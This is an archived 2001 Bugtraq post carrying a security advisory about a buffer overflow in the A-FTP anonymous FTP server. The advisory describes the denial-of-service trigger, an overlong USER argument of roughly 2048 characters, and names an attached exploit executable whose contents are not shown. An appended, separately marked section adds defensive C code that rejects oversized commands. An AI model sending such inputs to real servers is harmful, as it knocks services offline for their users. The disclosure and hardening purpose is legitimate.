6655722 2001-06-21 16:26 +0200  /110 lines/ Cartel Informatique Security Research Labs <srl@cartel-info.fr>
Sent by: joel@lysator.liu.se
Imported: 2001-06-22  02:31  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17545>
Subject: A-FTP Anonymous FTP Server Remote DoS attack Vulnerability
------------------------------------------------------------
A-FTP Anonymous FTP Server Remote DoS attack Vulnerability

Cartel Advisory Code:  CART-0102


Vendor Affected:

A-FTP Server - Eirik Helgeland 
softhead@online.no / softhead@x-stream.no


What It Is (from the author):
A free Unix Compatible Anonymous FTP server, running hidden from the
user.
Can be started from a floppy without changing any ini or registry
settings on the host machine.


Public Disclosure Date:
21-06-2001


Systems Affected:
a-FTP Anonymous FTP Server

Credits: 
Nicolas Brulez - Brulez@cartel-info.fr

Problem:

Cartel security team has found a buffer overflow in the A-FTP
anonymous FTP server, which means that an attacker can execute a
denial of service attack against it.  Once the big buffer has been
sent, the server is vulnerable.  Only one more connection is needed
to make the FTP service unavailable.


Extra Notes:

If no one tries to log in before the attacker's logout, the server will
still work.  Here comes a fully working exploit given as a proof of
concept for educational purposes only.  This exploit has been fully
coded in Win32 assembly language.  Cartel security team can't be held
responsible for anything you do with this file.

Example: 

220 Anonymous FTP Server Ready
USER [buffer]


[buffer] is around 2048 characters. (more or less)
It now needs a connection in order to crash.
Something like a : "ftp ip" will do the trick.
Result: FTP service is unavailable.



Date of Vendor Notification:
20-6-2001

Status:  

Waiting answer from the author.

Fix: 
none yet.


Greetings to my friends at:

USSR, Hert, Vauban systems and qualys.


About:

Cartel is a company based in France, dedicated to Research about
network security and application security systems.


Security services provided are :

- Firewalls testing
- Network Penetration Testing
- Application Security Testing
- Data protecting
- Intrusion Detection systems
- Binary auditing
- Secured hosting
- Antivirus
- PKI
- VPN

Copyright (c) Cartel informatique Security Research LABS.
This Document is copyrighted. It can't be edited nor republished
without explicit consent of CARTEL LABS.


For more information, feel free to contact us.

Cartel info security research labs
mail: srl@cartel-info.fr
http://securite.cartel-info.fr/  (french site)
(6655722) /Cartel Informatique Security Research Labs <srl@cartel-info.fr>/(Re-wrapped)
Attachment (application/octet-stream) in text 6655723
6655723 2001-06-21 16:26 +0200  /13 lines/ Cartel Informatique Security Research Labs <srl@cartel-info.fr>
Attachment file name: "aftpkill.EXE"
Imported: 2001-06-22  02:31  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17546>
Attachment (text/plain) to text 6655722
Subject: Attachment (aftpkill.EXE) to: A-FTP Anonymous FTP Server Remote DoS attack Vulnerability
------------------------------------------------------------
(6655723) /Cartel Informatique Security Research Labs <srl@cartel-info.fr>/(Re-wrapped)
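
The advisory's trigger is a USER argument of around 2048 characters. The C example below is added here and is neither A-FTP's code (which this page does not show) nor Cartel's: it is a command-line parser that answers oversized input with FTP reply 500 or 501 before anything is copied. The limits MAX_LINE and MAX_ARG and the name parse_command are assumptions chosen for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_LINE 512  /* assumed cap on one command line, CRLF included */
#define MAX_ARG   64  /* assumed cap on a command argument */

struct ftp_cmd {
    char verb[5];            /* 3- or 4-letter verb plus NUL */
    char arg[MAX_ARG + 1];   /* argument plus NUL */
};

/* Parse one received line of len bytes (not NUL-terminated) into out.
 * Returns 0 on success or the FTP reply code to send: 500 for an
 * overlong line or malformed verb, 501 for an overlong argument.
 * Oversized input is rejected before any copy takes place. */
int parse_command(const char *line, size_t len, struct ftp_cmd *out)
{
    size_t vlen = 0, start, alen, k;

    memset(out, 0, sizeof *out);
    if (len > MAX_LINE)
        return 500;
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                               /* strip CRLF */
    while (vlen < len && line[vlen] != ' ')
        vlen++;                              /* verb ends at first space */
    if (vlen < 3 || vlen > 4)
        return 500;
    start = (vlen < len) ? vlen + 1 : len;   /* skip the separating space */
    alen = len - start;
    if (alen > MAX_ARG)
        return 501;
    for (k = 0; k < vlen; k++)
        out->verb[k] = (char)toupper((unsigned char)line[k]);
    memcpy(out->arg, line + start, alen);    /* alen <= MAX_ARG, NUL kept */
    return 0;
}

int main(void)
{
    char big[5 + 2048 + 2];  /* constructed input: "USER " + 2048 'A' + CRLF */
    struct ftp_cmd cmd;

    memcpy(big, "USER ", 5);
    memset(big + 5, 'A', 2048);
    memcpy(big + 5 + 2048, "\r\n", 2);
    printf("oversized USER -> %d\n", parse_command(big, sizeof big, &cmd));
    printf("normal USER    -> %d\n", parse_command("USER anonymous\r\n", 16, &cmd));
    return 0;
}
```

The socket read that feeds parse_command needs the same bound: read into a buffer of MAX_LINE bytes and close the connection if no CRLF arrives within it.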